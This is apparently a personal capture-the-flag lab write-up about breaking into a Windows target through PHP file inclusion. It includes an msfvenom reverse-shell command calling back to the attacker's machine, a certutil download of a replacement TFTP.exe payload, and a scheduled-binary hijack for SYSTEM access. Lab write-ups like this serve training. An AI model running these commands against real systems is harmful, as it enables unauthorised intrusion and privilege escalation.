April 22nd 2023
Target given: 192.168.53.53
Nmap on target: sudo nmap -sC -sV -v -p- 192.168.53.53 (-sC Common scripts; -sV service Versions; -v verbose (start seeing data to research results sooner); -p- all ports)
Takes some time since it runs through a lot of scripts
Results show that it's a windows device due to all the msrpc ports open.
Also 445 is SMB
Zenith AI analysis:
So now to check the versions for vulns.
Welp DOS won't get root so onto the next.
Maybe SMB fileshare client as an Anon / Null user?
I mean it was worth a shot. You know sometimes the easiest way into a treasure trove is through the front door 😆
Now to check the web pages on 443 and 8080 to see if there are websites since there's a Maria database on 3306 so it may be worth seeing if I can edit it through the sites
443 on https didn't load but 8080 did
Time to rip it apart. using grep since I don't want spam on 400 status codes
Will hit up parent directories first then children if needed. Mass open site, dashboard, and img.
Well img is sus since it shows the files like that.
Also site is sketch since it references the page as a .php file via local file inclusion LFI so maybe I can grab other things that arent local?
My IP is 192.168.49.53 so I'll try a netcat nc reverse listener
Also wow the proving grounds default Kali is so slow. Will need to VPN in and do these on my own kali since this is ridiculous
Well the target system spoke spanish but no "Hola! Como Estas?" /hola page from me thus the connection closed.
At least it can connect to an attack box and try to pull a page so now to have it pull a reverse shell from me.
I read somewhere that it's best to first pull a script that isn't the reverse shell but a page that then downloads the rev shell once it's already been downloaded to the target server. Since the target webserver reads php we'll match format and give it a php file.
Let's craft the reverse shell via venom
Since target is running a php site we'll use a php reverse shell. Also since 445 is open we can use that as a listening port since it is already open and won't be easily blocked.
msfvenom -p php/reverse_php LHOST=192.168.49.53 LPORT=445 > reverse.php
Now to set up a http server so target can actually download them:
And I'm in. Remember to use "type" to read files in windows
After submitting the access flag I'm going for root / system
Time to explore
TFTP.exe runs every 5 minutes and probably runs with system privileges
I'll replace TFTP.exe with my own version for a more privileged shell
It's normal to have 10's of thousands of bytes of bloat bs since it's windows.
Now to download new TFTP.EXE file
certutil.exe -f -urlcache -split http://192.168.49.53:80/TFTP.EXE
Got 200 codes from my http server for the new .exe so now make a new listener and wait for the connection to catch for a system level root before looking for the system level flags.